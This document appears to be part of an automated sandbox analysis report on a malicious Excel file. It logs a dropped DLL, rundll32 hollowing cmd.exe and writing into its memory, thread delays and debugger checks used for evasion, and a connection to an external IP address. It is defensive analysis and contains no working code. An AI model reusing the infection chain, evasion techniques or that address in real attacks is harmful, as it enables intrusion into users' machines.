Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 245481
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 248977
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 308250
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 276112
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 453874
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 564679
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 198282
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 295626
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 465541
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -245481s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -248977s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -308250s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -276112s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -84184s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -453874s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -59831s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -564679s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -51978s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -198282s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -295626s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -58419s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -465541s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -102944s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 5796Thread sleep time: -55018s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_67335D36 FindFirstFileExW,
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 245481
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 248977
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 308250
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 276112
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 84184
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 453874
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 59831
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 564679
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 51978
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 198282
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 295626
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 58419
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 465541
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 102944
Source: C:\Windows\SysWOW64\cmd.exeThread delayed: delay time: 55018
Source: rundll32.exe, 00000001.00000002.802478061.000000000301A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_673337A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_67332A8C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_67335960 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6739FEC2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6739FDF8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6739F9FF push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_67323E56 __EH_prolog3_GS,__fassign,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,__fassign,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_673337A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6732A7E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_6732A9E4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 18.222.240.99 187
Allocates memory in foreign processesShow sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 11D0000 protect: page execute and read and write
Injects a PE file into a foreign processesShow sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D0000 value starts with: 4D5A
Sample uses process hollowing techniqueShow sources
Source: C:\Windows\SysWOW64\rundll32.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 11D0000
Writes to foreign memory regionsShow sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D0000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11FF000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 120A000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 120C000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 120D000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1011
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1068
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D106C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1072
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D107C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1082
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1087
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1091
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1097
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D109B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D10FC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1100
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1106
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1110
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1116
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D111B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1125
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D112B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D112F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1184
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1188
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D118E
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1198
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D119E
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D11A3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D11AD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D11B3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D11B7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1210
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1214
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D121A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1224
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D122A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D122F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1239
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D123F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1243
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D12CB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D12CF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D12D6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D12E0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D12E6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D12EB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D12F5
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D12FB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D12FF
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1350
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1354
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D135A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1364
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D136A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D136F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1379
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D137F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1383
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D141B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D141F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1426
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1430
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1436
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D143B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1445
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D144B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D144F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D14A4
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D14A8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D14AE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D14B8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D14BE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D14C3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D14CD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D14D3
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D14D7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1538
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D153C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1542
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D154C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1552
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1557
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1561
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1567
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D156B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D15C8
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D15CC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D15D2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D15DC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D15E2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D15E7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D15F1
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D15F7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D15FB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1616
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1623
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1641
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D164C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D16FA
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1700
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1706
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D179A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D17A0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D17A6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D193E
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1944
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D194A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D197A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1A31
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1A36
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1A3C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1A4B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1A54
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1AE0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1B30
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1BFD
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1C03
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1C09
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1E19
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1E1F
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D1E60
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2125
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D212B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2131
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D220A
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2210
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2216
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D22C0
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D22C6
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D22CC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2375
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D237B
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2381
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D243C
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2442
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2448
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D25A7
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D25DC
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2601
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2607
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2677
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D267D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D26CB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D26D2
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D26DB
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D26FE
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2704
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D276D
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 11D2773
